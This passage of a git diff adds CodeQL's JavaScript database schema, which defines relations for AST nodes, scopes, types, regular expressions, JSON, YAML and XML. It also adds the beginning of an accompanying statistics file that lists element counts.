= @import_meta_expr +| 116 = @assignlogandexpr +| 117 = @assignlogorexpr +| 118 = @assignnullishcoalescingexpr +| 119 = @template_pipe_ref +| 120 = @generated_code_expr +| 121 = @satisfies_expr +; + +@varaccess = @proper_varaccess | @export_varaccess; +@varref = @var_decl | @varaccess; + +@identifier = @label | @varref | @type_identifier; + +@literal = @null_literal | @boolean_literal | @number_literal | @string_literal | @regexp_literal | @bigint_literal; + +@propaccess = @dot_expr | @index_expr; + +@invokeexpr = @new_expr | @call_expr; + +@unaryexpr = @neg_expr | @plus_expr | @log_not_expr | @bit_not_expr | @typeof_expr | @void_expr | @delete_expr | @spread_element; + +@equality_test = @eq_expr | @neq_expr | @eqq_expr | @neqq_expr; + +@comparison = @equality_test | @lt_expr | @le_expr | @gt_expr | @ge_expr; + +@binaryexpr = @comparison | @lshift_expr | @rshift_expr | @urshift_expr | @add_expr | @sub_expr | @mul_expr | @div_expr | 
@mod_expr | @exp_expr | @bitor_expr | @xor_expr | @bitand_expr | @in_expr | @instanceof_expr | @logand_expr | @logor_expr | @nullishcoalescing_expr; + +@assignment = @assign_expr | @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr | @assign_mod_expr | @assign_exp_expr | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr | @assign_or_expr | @assign_xor_expr | @assign_and_expr | @assignlogandexpr | @assignlogorexpr | @assignnullishcoalescingexpr; + +@updateexpr = @preinc_expr | @postinc_expr | @predec_expr | @postdec_expr; + +@pattern = @varref | @array_pattern | @object_pattern; + +@comprehension_expr = @array_comprehension_expr | @generator_expr; + +@comprehension_block = @for_in_comprehension_block | @for_of_comprehension_block; + +@import_specifier = @named_import_specifier | @import_default_specifier | @import_namespace_specifier; + +@exportspecifier = @named_export_specifier | @export_default_specifier | @export_namespace_specifier; + +@type_keyword_operand = @import_declaration | @export_declaration | @import_specifier; + +@type_assertion = @as_type_assertion | @prefix_type_assertion; + +@class_definition = @class_decl_stmt | @class_expr; +@interface_definition = @interface_declaration | @interface_typeexpr; +@class_or_interface = @class_definition | @interface_definition; + +@lexical_decl = @var_decl | @type_decl; +@lexical_access = @varaccess | @local_type_access | @local_var_type_access | @local_namespace_access; +@lexical_ref = @lexical_decl | @lexical_access; + +@e4x_xml_attribute_selector = @e4x_xml_static_attribute_selector | @e4x_xml_dynamic_attribute_selector; +@e4x_xml_qualident = @e4x_xml_static_qualident | @e4x_xml_dynamic_qualident; + +expr_contains_template_tag_location( + int expr: @expr ref, + int location: @location ref +); + +@template_placeholder_tag_parent = @xmlelement | @xmlattribute | @file; + +template_placeholder_tag_info( + unique int node: @template_placeholder_tag, + int parentNode: 
@template_placeholder_tag_parent ref, + varchar(900) raw: string ref +); + +// scopes +scopes (unique int id: @scope, + int kind: int ref); + +case @scope.kind of + 0 = @global_scope +| 1 = @function_scope +| 2 = @catch_scope +| 3 = @module_scope +| 4 = @block_scope +| 5 = @for_scope +| 6 = @for_in_scope // for-of scopes work the same as for-in scopes +| 7 = @comprehension_block_scope +| 8 = @class_expr_scope +| 9 = @namespace_scope +| 10 = @class_decl_scope +| 11 = @interface_scope +| 12 = @type_alias_scope +| 13 = @mapped_type_scope +| 14 = @enum_scope +| 15 = @external_module_scope +| 16 = @conditional_type_scope; + +scopenodes (unique int node: @ast_node ref, + int scope: @scope ref); + +scopenesting (unique int inner: @scope ref, + int outer: @scope ref); + +// functions +@function = @function_decl_stmt | @function_expr | @arrow_function_expr; + +@parameterized = @function | @catch_clause; +@type_parameterized = @function | @class_or_interface | @type_alias_declaration | @mapped_typeexpr | @infer_typeexpr; + +is_generator (int fun: @function ref); +has_rest_parameter (int fun: @function ref); +is_async (int fun: @function ref); + +// variables and lexically scoped type names +#keyset[scope, name] +variables (unique int id: @variable, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_type_names (unique int id: @local_type_name, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_namespace_names (unique int id: @local_namespace_name, + varchar(900) name: string ref, + int scope: @scope ref); + +is_arguments_object (int id: @variable ref); + +@lexical_name = @variable | @local_type_name | @local_namespace_name; + +@bind_id = @varaccess | @local_var_type_access; +bind (unique int id: @bind_id ref, + int decl: @variable ref); + +decl (unique int id: @var_decl ref, + int decl: @variable ref); + +@typebind_id = @local_type_access | @export_varaccess; +typebind (unique int id: @typebind_id 
ref, + int decl: @local_type_name ref); + +@typedecl_id = @type_decl | @var_decl; +typedecl (unique int id: @typedecl_id ref, + int decl: @local_type_name ref); + +namespacedecl (unique int id: @var_decl ref, + int decl: @local_namespace_name ref); + +@namespacebind_id = @local_namespace_access | @export_varaccess; +namespacebind (unique int id: @namespacebind_id ref, + int decl: @local_namespace_name ref); + + +// properties in object literals, property patterns in object patterns, and method declarations in classes +#keyset[parent, index] +properties (unique int id: @property, + int parent: @property_parent ref, + int index: int ref, + int kind: int ref, + varchar(900) tostring: string ref); + +case @property.kind of + 0 = @value_property +| 1 = @property_getter +| 2 = @property_setter +| 3 = @jsx_attribute +| 4 = @function_call_signature +| 5 = @constructor_call_signature +| 6 = @index_signature +| 7 = @enum_member +| 8 = @proper_field +| 9 = @parameter_field +| 10 = @static_initializer +; + +@property_parent = @obj_expr | @object_pattern | @class_definition | @jsx_element | @interface_definition | @enum_declaration; +@property_accessor = @property_getter | @property_setter; +@call_signature = @function_call_signature | @constructor_call_signature; +@field = @proper_field | @parameter_field; +@field_or_vardeclarator = @field | @var_declarator; + +is_computed (int id: @property ref); +is_method (int id: @property ref); +is_static (int id: @property ref); +is_abstract_member (int id: @property ref); +is_const_enum (int id: @enum_declaration ref); +is_abstract_class (int id: @class_decl_stmt ref); + +has_public_keyword (int id: @property ref); +has_private_keyword (int id: @property ref); +has_protected_keyword (int id: @property ref); +has_readonly_keyword (int id: @property ref); +has_type_keyword (int id: @type_keyword_operand ref); +is_optional_member (int id: @property ref); +has_definite_assignment_assertion (int id: @field_or_vardeclarator ref); 
+is_optional_parameter_declaration (unique int parameter: @pattern ref); + +#keyset[constructor, param_index] +parameter_fields( + unique int field: @parameter_field ref, + int constructor: @function_expr ref, + int param_index: int ref +); + +// types +#keyset[parent, idx] +typeexprs ( + unique int id: @typeexpr, + int kind: int ref, + int parent: @typeexpr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref +); + +case @typeexpr.kind of + 0 = @local_type_access +| 1 = @type_decl +| 2 = @keyword_typeexpr +| 3 = @string_literal_typeexpr +| 4 = @number_literal_typeexpr +| 5 = @boolean_literal_typeexpr +| 6 = @array_typeexpr +| 7 = @union_typeexpr +| 8 = @indexed_access_typeexpr +| 9 = @intersection_typeexpr +| 10 = @parenthesized_typeexpr +| 11 = @tuple_typeexpr +| 12 = @keyof_typeexpr +| 13 = @qualified_type_access +| 14 = @generic_typeexpr +| 15 = @type_label +| 16 = @typeof_typeexpr +| 17 = @local_var_type_access +| 18 = @qualified_var_type_access +| 19 = @this_var_type_access +| 20 = @predicate_typeexpr +| 21 = @interface_typeexpr +| 22 = @type_parameter +| 23 = @plain_function_typeexpr +| 24 = @constructor_typeexpr +| 25 = @local_namespace_access +| 26 = @qualified_namespace_access +| 27 = @mapped_typeexpr +| 28 = @conditional_typeexpr +| 29 = @infer_typeexpr +| 30 = @import_type_access +| 31 = @import_namespace_access +| 32 = @import_var_type_access +| 33 = @optional_typeexpr +| 34 = @rest_typeexpr +| 35 = @bigint_literal_typeexpr +| 36 = @readonly_typeexpr +| 37 = @template_literal_typeexpr +; + +@typeref = @typeaccess | @type_decl; +@type_identifier = @type_decl | @local_type_access | @type_label | @local_var_type_access | @local_namespace_access; +@typeexpr_parent = @expr | @stmt | @property | @typeexpr; +@literal_typeexpr = @string_literal_typeexpr | @number_literal_typeexpr | @boolean_literal_typeexpr | @bigint_literal_typeexpr; +@typeaccess = @local_type_access | @qualified_type_access | @import_type_access; +@vartypeaccess = 
@local_var_type_access | @qualified_var_type_access | @this_var_type_access | @import_var_type_access; +@namespace_access = @local_namespace_access | @qualified_namespace_access | @import_namespace_access; +@import_typeexpr = @import_type_access | @import_namespace_access | @import_var_type_access; + +@function_typeexpr = @plain_function_typeexpr | @constructor_typeexpr; + +// types +types ( + unique int id: @type, + int kind: int ref, + varchar(900) tostring: string ref +); + +#keyset[parent, idx] +type_child ( + int child: @type ref, + int parent: @type ref, + int idx: int ref +); + +case @type.kind of + 0 = @any_type +| 1 = @string_type +| 2 = @number_type +| 3 = @union_type +| 4 = @true_type +| 5 = @false_type +| 6 = @type_reference +| 7 = @object_type +| 8 = @canonical_type_variable_type +| 9 = @typeof_type +| 10 = @void_type +| 11 = @undefined_type +| 12 = @null_type +| 13 = @never_type +| 14 = @plain_symbol_type +| 15 = @unique_symbol_type +| 16 = @objectkeyword_type +| 17 = @intersection_type +| 18 = @tuple_type +| 19 = @lexical_type_variable_type +| 20 = @this_type +| 21 = @number_literal_type +| 22 = @string_literal_type +| 23 = @unknown_type +| 24 = @bigint_type +| 25 = @bigint_literal_type +; + +@boolean_literal_type = @true_type | @false_type; +@symbol_type = @plain_symbol_type | @unique_symbol_type; +@union_or_intersection_type = @union_type | @intersection_type; +@typevariable_type = @canonical_type_variable_type | @lexical_type_variable_type; + +has_asserts_keyword(int node: @predicate_typeexpr ref); + +@typed_ast_node = @expr | @typeexpr | @function; +ast_node_type( + unique int node: @typed_ast_node ref, + int typ: @type ref); + +declared_function_signature( + unique int node: @function ref, + int sig: @signature_type ref +); + +invoke_expr_signature( + unique int node: @invokeexpr ref, + int sig: @signature_type ref +); + +invoke_expr_overload_index( + unique int node: @invokeexpr ref, + int index: int ref +); + +symbols ( + unique int id: 
@symbol, + int kind: int ref, + varchar(900) name: string ref +); + +symbol_parent ( + unique int symbol: @symbol ref, + int parent: @symbol ref +); + +symbol_module ( + int symbol: @symbol ref, + varchar(900) moduleName: string ref +); + +symbol_global ( + int symbol: @symbol ref, + varchar(900) globalName: string ref +); + +case @symbol.kind of + 0 = @root_symbol +| 1 = @member_symbol +| 2 = @other_symbol +; + +@type_with_symbol = @type_reference | @typevariable_type | @typeof_type | @unique_symbol_type; +@ast_node_with_symbol = @type_definition | @namespace_definition | @toplevel | @typeaccess | @namespace_access | @var_decl | @function | @invokeexpr | @import_declaration | @external_module_reference | @external_module_declaration; + +ast_node_symbol( + unique int node: @ast_node_with_symbol ref, + int symbol: @symbol ref); + +type_symbol( + unique int typ: @type_with_symbol ref, + int symbol: @symbol ref); + +#keyset[typ, name] +type_property( + int typ: @type ref, + varchar(900) name: string ref, + int propertyType: @type ref); + +type_alias( + unique int aliasType: @type ref, + int underlyingType: @type ref); + +@literal_type = @string_literal_type | @number_literal_type | @boolean_literal_type | @bigint_literal_type; +@type_with_literal_value = @string_literal_type | @number_literal_type | @bigint_literal_type; +type_literal_value( + unique int typ: @type_with_literal_value ref, + varchar(900) value: string ref); + +signature_types ( + unique int id: @signature_type, + int kind: int ref, + varchar(900) tostring: string ref, + int type_parameters: int ref, + int required_params: int ref +); + +is_abstract_signature( + unique int sig: @signature_type ref +); + +signature_rest_parameter( + unique int sig: @signature_type ref, + int rest_param_arra_type: @type ref +); + +case @signature_type.kind of + 0 = @function_signature_type +| 1 = @constructor_signature_type +; + +#keyset[typ, kind, index] +type_contains_signature ( + int typ: @type ref, + int kind: int 
ref, // constructor/call/index + int index: int ref, // ordering of overloaded signatures + int sig: @signature_type ref +); + +#keyset[parent, index] +signature_contains_type ( + int child: @type ref, + int parent: @signature_type ref, + int index: int ref +); + +#keyset[sig, index] +signature_parameter_name ( + int sig: @signature_type ref, + int index: int ref, + varchar(900) name: string ref +); + +number_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +string_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +base_type_names( + int typeName: @symbol ref, + int baseTypeName: @symbol ref +); + +self_types( + int typeName: @symbol ref, + int selfType: @type_reference ref +); + +tuple_type_min_length( + unique int typ: @type ref, + int minLength: int ref +); + +tuple_type_rest_index( + unique int typ: @type ref, + int index: int ref +); + +// comments +comments (unique int id: @comment, + int kind: int ref, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(900) tostring: string ref); + +case @comment.kind of + 0 = @slashslash_comment +| 1 = @slashstar_comment +| 2 = @doc_comment +| 3 = @html_comment_start +| 4 = @htmlcommentend; + +@html_comment = @html_comment_start | @htmlcommentend; +@line_comment = @slashslash_comment | @html_comment; +@block_comment = @slashstar_comment | @doc_comment; + +// source lines +lines (unique int id: @line, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(2) terminator: string ref); +indentation (int file: @file ref, + int lineno: int ref, + varchar(1) indentChar: string ref, + int indentDepth: int ref); + +// JavaScript parse errors +js_parse_errors (unique int id: @js_parse_error, + int toplevel: @toplevel ref, + varchar(900) message: string ref, + varchar(900) line: string ref); + +// regular expressions +#keyset[parent, idx] +regexpterm (unique int id: @regexpterm, + int kind: int ref, + int parent: @regexpparent 
ref, + int idx: int ref, + varchar(900) tostring: string ref); + +@regexpparent = @regexpterm | @regexp_literal | @string_literal | @add_expr; + +case @regexpterm.kind of + 0 = @regexp_alt +| 1 = @regexp_seq +| 2 = @regexp_caret +| 3 = @regexp_dollar +| 4 = @regexp_wordboundary +| 5 = @regexp_nonwordboundary +| 6 = @regexp_positive_lookahead +| 7 = @regexp_negative_lookahead +| 8 = @regexp_star +| 9 = @regexp_plus +| 10 = @regexp_opt +| 11 = @regexp_range +| 12 = @regexp_dot +| 13 = @regexp_group +| 14 = @regexp_normal_constant +| 15 = @regexp_hex_escape +| 16 = @regexp_unicode_escape +| 17 = @regexp_dec_escape +| 18 = @regexp_oct_escape +| 19 = @regexp_ctrl_escape +| 20 = @regexp_char_class_escape +| 21 = @regexp_id_escape +| 22 = @regexp_backref +| 23 = @regexp_char_class +| 24 = @regexp_char_range +| 25 = @regexp_positive_lookbehind +| 26 = @regexp_negative_lookbehind +| 27 = @regexp_unicode_property_escape; + +regexp_parse_errors (unique int id: @regexp_parse_error, + int regexp: @regexpterm ref, + varchar(900) message: string ref); + +@regexp_quantifier = @regexp_star | @regexp_plus | @regexp_opt | @regexp_range; +@regexp_escape = @regexp_char_escape | @regexp_char_class_escape | @regexp_unicode_property_escape; +@regexp_char_escape = @regexp_hex_escape | @regexp_unicode_escape | @regexp_dec_escape | @regexp_oct_escape | @regexp_ctrl_escape | @regexp_id_escape; +@regexp_constant = @regexp_normal_constant | @regexp_char_escape; +@regexp_lookahead = @regexp_positive_lookahead | @regexp_negative_lookahead; +@regexp_lookbehind = @regexp_positive_lookbehind | @regexp_negative_lookbehind; +@regexp_subpattern = @regexp_lookahead | @regexp_lookbehind; +@regexp_anchor = @regexp_dollar | @regexp_caret; + +is_greedy (int id: @regexp_quantifier ref); +range_quantifier_lower_bound (unique int id: @regexp_range ref, int lo: int ref); +range_quantifier_upper_bound (unique int id: @regexp_range ref, int hi: int ref); +is_capture (unique int id: @regexp_group ref, int number: 
int ref); +is_named_capture (unique int id: @regexp_group ref, string name: string ref); +is_inverted (int id: @regexp_char_class ref); +regexp_const_value (unique int id: @regexp_constant ref, varchar(1) value: string ref); +char_class_escape (unique int id: @regexp_char_class_escape ref, varchar(1) value: string ref); +backref (unique int id: @regexp_backref ref, int value: int ref); +named_backref (unique int id: @regexp_backref ref, string name: string ref); +unicode_property_escapename (unique int id: @regexp_unicode_property_escape ref, string name: string ref); +unicode_property_escapevalue (unique int id: @regexp_unicode_property_escape ref, string value: string ref); + +// tokens +#keyset[toplevel, idx] +tokeninfo (unique int id: @token, + int kind: int ref, + int toplevel: @toplevel ref, + int idx: int ref, + varchar(900) value: string ref); + +case @token.kind of + 0 = @token_eof +| 1 = @token_null_literal +| 2 = @token_boolean_literal +| 3 = @token_numeric_literal +| 4 = @token_string_literal +| 5 = @token_regular_expression +| 6 = @token_identifier +| 7 = @token_keyword +| 8 = @token_punctuator; + +// associate comments with the token immediately following them (which may be EOF) +next_token (int comment: @comment ref, int token: @token ref); + +// JSON +#keyset[parent, idx] +json (unique int id: @json_value, + int kind: int ref, + int parent: @json_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +json_literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @json_value ref); + +json_properties (int obj: @json_object ref, + varchar(900) property: string ref, + int value: @json_value ref); + +json_errors (unique int id: @json_parse_error, + varchar(900) message: string ref); + +json_locations(unique int locatable: @json_locatable ref, + int location: @location_default ref); + +case @json_value.kind of + 0 = @json_null +| 1 = @json_boolean +| 2 = @json_number +| 3 = @json_string +| 4 = 
@json_array
+| 5 = @json_object;
+
+@json_parent = @json_object | @json_array | @file;
+
+@json_locatable = @json_value | @json_parse_error;
+
+// locations
+@ast_node = @toplevel | @stmt | @expr | @property | @typeexpr;
+
+@locatable = @file
+ | @ast_node
+ | @comment
+ | @line
+ | @js_parse_error | @regexp_parse_error
+ | @regexpterm
+ | @json_locatable
+ | @token
+ | @cfg_node
+ | @jsdoc | @jsdoc_type_expr | @jsdoc_tag
+ | @yaml_locatable
+ | @xmllocatable
+ | @configLocatable
+ | @template_placeholder_tag;
+
+hasLocation (unique int locatable: @locatable ref,
+ int location: @location ref);
+
+// CFG
+entry_cfg_node (unique int id: @entry_node, int container: @stmt_container ref);
+exit_cfg_node (unique int id: @exit_node, int container: @stmt_container ref);
+guard_node (unique int id: @guard_node, int kind: int ref, int test: @expr ref);
+case @guard_node.kind of
+ 0 = @falsy_guard
+| 1 = @truthy_guard;
+@condition_guard = @falsy_guard | @truthy_guard;
+
+@synthetic_cfg_node = @entry_node | @exit_node | @guard_node;
+@cfg_node = @synthetic_cfg_node | @expr_parent;
+
+successor (int pred: @cfg_node ref, int succ: @cfg_node ref);
+
+// JSDoc comments
+jsdoc (unique int id: @jsdoc, varchar(900) description: string ref, int comment: @comment ref);
+#keyset[parent, idx]
+jsdoc_tags (unique int id: @jsdoc_tag, varchar(900) title: string ref,
+ int parent: @jsdoc ref, int idx: int ref, varchar(900) tostring: string ref);
+jsdoc_tag_descriptions (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref);
+jsdoc_tag_names (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref);
+
+#keyset[parent, idx]
+jsdoc_type_exprs (unique int id: @jsdoc_type_expr,
+ int kind: int ref,
+ int parent: @jsdoc_type_expr_parent ref,
+ int idx: int ref,
+ varchar(900) tostring: string ref);
+case @jsdoc_type_expr.kind of
+ 0 = @jsdoc_any_type_expr
+| 1 = @jsdoc_null_type_expr
+| 2 = @jsdoc_undefined_type_expr
+| 3 = @jsdoc_unknown_type_expr
+| 4 = @jsdoc_void_type_expr
+| 5
= @jsdoc_named_type_expr
+| 6 = @jsdoc_applied_type_expr
+| 7 = @jsdoc_nullable_type_expr
+| 8 = @jsdoc_non_nullable_type_expr
+| 9 = @jsdoc_record_type_expr
+| 10 = @jsdoc_array_type_expr
+| 11 = @jsdoc_union_type_expr
+| 12 = @jsdoc_function_type_expr
+| 13 = @jsdoc_optional_type_expr
+| 14 = @jsdoc_rest_type_expr
+;
+
+#keyset[id, idx]
+jsdoc_record_field_name (int id: @jsdoc_record_type_expr ref, int idx: int ref, varchar(900) name: string ref);
+jsdoc_prefix_qualifier (int id: @jsdoc_type_expr ref);
+jsdoc_has_new_parameter (int fn: @jsdoc_function_type_expr ref);
+
+@jsdoc_type_expr_parent = @jsdoc_type_expr | @jsdoc_tag;
+
+jsdoc_errors (unique int id: @jsdoc_error, int tag: @jsdoc_tag ref, varchar(900) message: string ref, varchar(900) tostring: string ref);
+
+@dataflownode = @expr | @function_decl_stmt | @class_decl_stmt | @namespace_declaration | @enum_declaration | @property;
+
+@optionalchainable = @call_expr | @propaccess;
+
+isOptionalChaining(int id: @optionalchainable ref);
+
+/**
+ * The time taken for the extraction of a file.
+ * This table contains non-deterministic content.
+ *
+ * The sum of the `time` column for each (`file`, `timerKind`) pair
+ * is the total time taken for extraction of `file`. The `extractionPhase`
+ * column provides a granular view of the extraction time of the file.
+ */
+extraction_time(
+ int file : @file ref,
+ // see `com.semmle.js.extractor.ExtractionMetrics.ExtractionPhase`.
+ int extractionPhase: int ref,
+ // 0 for the elapsed CPU time in nanoseconds, 1 for the elapsed wallclock time in nanoseconds
+ int timerKind: int ref,
+ float time: float ref
+)
+
+/**
+* Non-timing related data for the extraction of a single file.
+* This table contains non-deterministic content.
+*/
+extraction_data(
+ int file : @file ref,
+ // the absolute path to the cache file
+ varchar(900) cacheFile: string ref,
+ boolean fromCache: boolean ref,
+ int length: int ref
+)
+
+/*- YAML -*/
+
+#keyset[parent, idx]
+yaml (unique int id: @yaml_node,
+ int kind: int ref,
+ int parent: @yaml_node_parent ref,
+ int idx: int ref,
+ string tag: string ref,
+ string tostring: string ref);
+
+case @yaml_node.kind of
+ 0 = @yaml_scalar_node
+| 1 = @yaml_mapping_node
+| 2 = @yaml_sequence_node
+| 3 = @yaml_alias_node
+;
+
+@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node;
+
+@yaml_node_parent = @yaml_collection_node | @file;
+
+yaml_anchors (unique int node: @yaml_node ref,
+ string anchor: string ref);
+
+yaml_aliases (unique int alias: @yaml_alias_node ref,
+ string target: string ref);
+
+yaml_scalars (unique int scalar: @yaml_scalar_node ref,
+ int style: int ref,
+ string value: string ref);
+
+yaml_errors (unique int id: @yaml_error,
+ string message: string ref);
+
+yaml_locations(unique int locatable: @yaml_locatable ref,
+ int location: @location_default ref);
+
+@yaml_locatable = @yaml_node | @yaml_error;
+
+/*- XML Files -*/
+
+xmlEncoding(
+ unique int id: @file ref,
+ string encoding: string ref
+);
+
+xmlDTDs(
+ unique int id: @xmldtd,
+ string root: string ref,
+ string publicId: string ref,
+ string systemId: string ref,
+ int fileid: @file ref
+);
+
+xmlElements(
+ unique int id: @xmlelement,
+ string name: string ref,
+ int parentid: @xmlparent ref,
+ int idx: int ref,
+ int fileid: @file ref
+);
+
+xmlAttrs(
+ unique int id: @xmlattribute,
+ int elementid: @xmlelement ref,
+ string name: string ref,
+ string value: string ref,
+ int idx: int ref,
+ int fileid: @file ref
+);
+
+xmlNs(
+ int id: @xmlnamespace,
+ string prefixName: string ref,
+ string URI: string ref,
+ int fileid: @file ref
+);
+
+xmlHasNs(
+ int elementId: @xmlnamespaceable ref,
+ int nsId: @xmlnamespace ref,
+ int fileid: @file ref
+);
+
+xmlComments(
+ unique int
id: @xmlcomment,
+ string text: string ref,
+ int parentid: @xmlparent ref,
+ int fileid: @file ref
+);
+
+xmlChars(
+ unique int id: @xmlcharacters,
+ string text: string ref,
+ int parentid: @xmlparent ref,
+ int idx: int ref,
+ int isCDATA: int ref,
+ int fileid: @file ref
+);
+
+@xmlparent = @file | @xmlelement;
+@xmlnamespaceable = @xmlelement | @xmlattribute;
+
+xmllocations(
+ int xmlElement: @xmllocatable ref,
+ int location: @location_default ref
+);
+
+@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace;
+
+/*- Configuration files with key value pairs -*/
+
+configs(
+ unique int id: @config
+);
+
+configNames(
+ unique int id: @configName,
+ int config: @config ref,
+ string name: string ref
+);
+
+configValues(
+ unique int id: @configValue,
+ int config: @config ref,
+ string value: string ref
+);
+
+configLocations(
+ int locatable: @configLocatable ref,
+ int location: @location_default ref
+);
+
+@configLocatable = @config | @configName | @configValue;
diff --git a/ql/src/semmlecode.javascript.dbscheme.stats b/ql/src/semmlecode.javascript.dbscheme.stats
new file mode 100644
index 00000000000..97ba6f9bcc3
--- /dev/null
+++ b/ql/src/semmlecode.javascript.dbscheme.stats
@@ -0,0 +1,28248 @@ + + + + +@location_default +15664049 + + +@file +6457 + + +@folder +1590 + + +@externalDataElement +950 + + +@toplevel +5320 + + +@script +5200 + + +@inline_script +86 + + +@event_handler +31 + + +@javascript_url +3 + + +@template_toplevel +100 + + +@stmt +1096691 + + +@empty_stmt +1136 + + +@block_stmt +204994 + + +@expr_stmt +610340 + + +@if_stmt +68214 + + +@labeled_stmt +1378 + + +@break_stmt +10149 + + +@continue_stmt +1642 + + +@with_stmt +4 + + +@switch_stmt +1569 + + +@return_stmt +48209 + + +@throw_stmt +2305 + + +@try_stmt +1316 + + +@while_stmt +3120 + + +@do_while_stmt +1471 + + +@for_stmt +5385 + + +@for_in_stmt +1315 + + +@debugger_stmt +3 + + +@function_decl_stmt +16771 + + +@var_decl_stmt +105606 + + +@case +8674 + + +@catch_clause +1272 + + +@for_of_stmt +61 + + +@const_decl_stmt +1118 + + +@let_stmt +551 + + +@legacy_let_stmt +1 + + +@for_each_stmt +1 + + +@class_decl_stmt +41 + + +@import_declaration +8 + + +@export_all_declaration +1 + + +@export_as_namespace_declaration +5 + + +@global_augmentation_declaration +5 + + +@using_decl_stmt +5 + + +@export_default_declaration +5 + + +@export_named_declaration +31 + + +@expr +5495305 + + +@label +722373 + + +@null_literal +15525 + + +@boolean_literal +31652 + + +@number_literal +557620 + + +@string_literal +268843 + + +@regexp_literal +2773 + + +@this_expr +128651 + + +@array_expr +28131 + + +@obj_expr +50958 + + +@function_expr +95744 + + +@seq_expr +2457 + + +@conditional_expr +8111 + + +@new_expr +19023 + + +@call_expr +487075 + + +@dot_expr +602582 + + +@index_expr +105192 + + +@neg_expr +11993 + + +@plus_expr +731 + + +@log_not_expr +19385 + + +@bit_not_expr +403 + + +@typeof_expr +4540 + + +@void_expr +51 + + +@delete_expr +1310 + + +@eq_expr +13468 + + +@neq_expr +5338 + + +@eqq_expr +17758 + + +@neqq_expr +5818 + + +@lt_expr +10254 + + +@le_expr +1503 + + +@gt_expr +5438 + + +@ge_expr +2527 + + +@lshift_expr +5655 + + +@rshift_expr +27749 + + +@urshift_expr +4331 + + 
+@add_expr +88032 + + +@sub_expr +10789 + + +@mul_expr +14075 + + +@div_expr +2496 + + +@mod_expr +655 + + +@bitor_expr +42853 + + +@xor_expr +503 + + +@bitand_expr +8538 + + +@in_expr +1135 + + +@instanceof_expr +1184 + + +@logand_expr +15892 + + +@logor_expr +12711 + + +@assign_expr +245084 + + +@assign_add_expr +6231 + + +@assign_sub_expr +823 + + +@assign_mul_expr +143 + + +@assign_div_expr +44 + + +@assign_mod_expr +17 + + +@assign_lshift_expr +57 + + +@assign_rshift_expr +86 + + +@assign_urshift_expr +96 + + +@assign_or_expr +586 + + +@assign_xor_expr +108 + + +@assign_and_expr +222 + + +@assignlogandexpr +1 + + +@assignlogorexpr +1 + + +@assignnullishcoalescingexpr +1 + + +@template_placeholder_tag +100 + + +@template_pipe_ref +100 + + +@generated_code_expr +100 + + +@satisfies_expr +100 + + +@preinc_expr +1792 + + +@postinc_expr +7103 + + +@predec_expr +457 + + +@postdec_expr +774 + + +@par_expr +86199 + + +@var_declarator +130843 + + +@arrow_function_expr +3730 + + +@spread_element +50 + + +@array_pattern +57 + + +@object_pattern +122 + + +@yield_expr +81 + + +@tagged_template_expr +27 + + +@template_literal +408 + + +@template_literal_typeexpr +100 + + +@template_element +639 + + +@array_comprehension_expr +3 + + +@generator_expr +1 + + +@for_in_comprehension_block +1 + + +@for_of_comprehension_block +3 + + +@legacy_letexpr +1 + + +@var_decl +250257 + + +@proper_varaccess +1295408 + + +@super_expr +11 + + +@newtarget_expr +1 + + +@import_meta_expr +1 + + +@named_import_specifier +4 + + +@import_default_specifier +4 + + +@import_namespace_specifier +2 + + +@named_export_specifier +5 + + +@export_default_specifier +5 + + +@export_namespace_specifier +5 + + +@export_assign_declaration +5 + + +@interface_declaration +5 + + +@type_alias_declaration +120 + + +@enum_declaration +252 + + +@external_module_declaration +100 + + +@external_module_reference +5 + + +@expression_with_type_arguments +45 + + +@prefix_type_assertion +1721 + + +@as_type_assertion +368 + + 
+@export_varaccess +15 + + +@decorator_list +2575 + + +@non_null_assertion +2159 + + +@dynamic_import +5 + + +@import_equals_declaration +5 + + +@namespace_declaration +5 + + +@namespace_scope +5 + + +@exp_expr +14075 + + +@assign_exp_expr +143 + + +@class_expr +41 + + +@scope +118172 + + +@global_scope +1 + + +@function_scope +116245 + + +@catch_scope +1272 + + +@module_scope +21 + + +@block_scope +584 + + +@for_scope +17 + + +@for_in_scope +28 + + +@comprehension_block_scope +4 + + +@class_expr_scope +41 + + +@class_decl_scope +2693 + + +@interface_scope +200 + + +@type_alias_scope +11 + + +@enum_scope +252 + + +@external_module_scope +100 + + +@mapped_type_scope +10 + + +@conditional_type_scope +100 + + +@variable +364388 + + +@local_type_name +23565 + + +@local_namespace_name +20832 + + +@property +142723 + + +@value_property +140856 + + +@property_getter +1529 + + +@property_setter +338 + + +@jsx_attribute +100 + + +@function_call_signature +2458 + + +@constructor_call_signature +37 + + +@index_signature +504 + + +@enum_member +2026 + + +@proper_field +16934 + + +@parameter_field +2693 + + +@static_initializer +100 + + +@local_type_access +25491 + + +@type_decl +2513 + + +@keyword_typeexpr +25306 + + +@string_literal_typeexpr +733 + + +@number_literal_typeexpr +3 + + +@boolean_literal_typeexpr +4 + + +@array_typeexpr +4579 + + +@union_typeexpr +852 + + +@intersection_typeexpr +27 + + +@parenthesized_typeexpr +62 + + +@tuple_typeexpr +98 + + +@keyof_typeexpr +3 + + +@indexed_access_typeexpr +3 + + +@qualified_type_access +3559 + + +@import_namespace_access +100 + + +@import_type_access +100 + + +@import_var_type_access +100 + + +@optional_typeexpr +100 + + +@rest_typeexpr +100 + + +@readonly_typeexpr +100 + + +@bigint_literal_typeexpr +100 + + +@generic_typeexpr +5220 + + +@type_label +3559 + + +@typeof_typeexpr +24 + + +@local_var_type_access +24 + + +@qualified_var_type_access +15 + + +@this_var_type_access +20 + + +@predicate_typeexpr +86 + + 
